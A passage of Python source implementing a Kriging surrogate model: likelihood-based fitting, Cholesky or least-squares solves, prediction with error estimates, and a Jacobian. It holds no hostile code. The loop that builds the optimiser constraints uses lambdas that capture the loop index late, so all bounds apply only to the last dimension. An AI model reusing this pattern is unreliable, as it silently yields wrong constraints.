super(KrigingSurrogate, self).fit(x, y)
self.m = len(x[0])
self.n = len(x)
if self.n <= 1:
raise ValueError(
'KrigingSurrogate require at least 2 training points.'
)
self.X = x
self.Y = y
def _calcll(thetas):
# Callback function
self.thetas = thetas
self._calculate_log_likelihood()
return -self.log_likelihood
cons = []
for i in xrange(self.m):
cons.append({'type': 'ineq', 'fun': lambda logt: logt[i] - log10(1e-2)}) # min
cons.append({'type': 'ineq', 'fun': lambda logt: log10(3) - logt[i]}) # max
self.thetas = minimize(_calcll, zeros(self.m), method='COBYLA',
constraints=cons, tol=1e-8).x
self._calculate_log_likelihood()
def _calculate_log_likelihood(self):
"""Calculates the log-likelihood (up to a constant) for a given
self.theta.
"""
R = zeros((self.n, self.n))
X, Y = self.X, self.Y
thetas = power(10., self.thetas)
# exponentially weighted distance formula
for i in xrange(self.n):
R[i, i + 1:self.n] = exp(-thetas.dot(square(X[i, ...] - X[i + 1:self.n, ...]).T))
R *= (1.0 - self.nugget)
R += R.T + eye(self.n)
self.R = R
one = ones(self.n)
rhs = column_stack([Y, one])
try:
# Cholesky Decomposition
self.R_fact = cho_factor(R)
sol = cho_solve(self.R_fact, rhs)
solve = lambda x: cho_solve(self.R_fact, x)
det_factor = log(abs(prod(diagonal(self.R_fact[0])) ** 2) + 1.e-16)
except (linalg.LinAlgError, ValueError):
# Since Cholesky failed, try linear least squares
self.R_fact = None # reset this to none, so we know not to use Cholesky
sol = lstsq(self.R, rhs)[0]
solve = lambda x: lstsq(self.R, x)[0]
det_factor = slogdet(self.R)[1]
self.mu = dot(one, sol[:, :-1]) / dot(one, sol[:, -1])
y_minus_mu = Y - self.mu
self.R_solve_ymu = solve(y_minus_mu)
self.R_solve_one = sol[:, -1]
self.sig2 = dot(y_minus_mu.T, self.R_solve_ymu) / self.n
if isinstance(self.sig2, ndarray):
self.log_likelihood = -self.n / 2. * slogdet(self.sig2)[1] \
- 1. / 2. * det_factor
else:
self.log_likelihood = -self.n / 2. * log(self.sig2) \
- 1. / 2. * det_factor
def predict(self, x):
"""Calculates a predicted value of the response based on the current
trained model for the supplied list of inputs.
:param x: Point at which the surrogate is evaluated.
"""
super(KrigingSurrogate, self).predict(x)
X, Y = self.X, self.Y
thetas = power(10., self.thetas)
r = exp(-thetas.dot(square((x - X).T)))
if self.R_fact is not None:
# Cholesky Decomposition
sol = cho_solve(self.R_fact, r).T
else:
# Linear Least Squares
sol = lstsq(self.R, r)[0].T
f = self.mu + dot(r, self.R_solve_ymu)
term1 = dot(r, sol)
# Note: sum(sol) should be 1, since Kriging is an unbiased
# estimator. This measures the effect of numerical instabilities.
bias = (1.0 - sum(sol)) ** 2. / sum(self.R_solve_one)
mse = self.sig2 * (1.0 - term1 + bias)
rmse = sqrt(abs(mse))
return f, rmse
def linearize(self, x):
"""Calculates the jacobian of the Kriging surface at the requested point.
:param x: Point at which the surrogate Jacobian is evaluated.
"""
thetas = power(10., self.thetas)
r = exp(-thetas.dot(square((x - self.X).T)))
# Z = einsum('i,ij->ij', X, Y) is equivalent to, but much faster and
# memory efficient than, diag(X).dot(Y) for vector X and 2D array Y.
# I.e. Z[i,j] = X[i]*Y[i,j]
gradr = r * -2 * einsum('i,ij->ij', thetas, (x - self.X).T)
jac = gradr.dot(self.R_solve_ymu).T
return jac
class FloatKrigingSurrogate(KrigingSurrogate):
"""Surrogate model based on the simple Kriging interpolation. Predictions are returned as floats,
which are the mean of the model's prediction.
"""
def predict(self, x):
dist = super(FloatKrigingSurrogate, self).predict(x)
return dist[0] # mean value
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.